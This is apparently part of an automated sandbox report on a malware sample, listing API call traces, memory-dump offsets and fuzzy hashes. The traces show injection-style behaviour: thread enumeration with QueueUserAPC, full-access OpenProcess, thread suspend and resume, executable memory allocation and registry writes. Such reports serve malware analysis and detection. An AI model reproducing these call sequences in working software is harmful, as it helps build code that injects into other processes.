    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
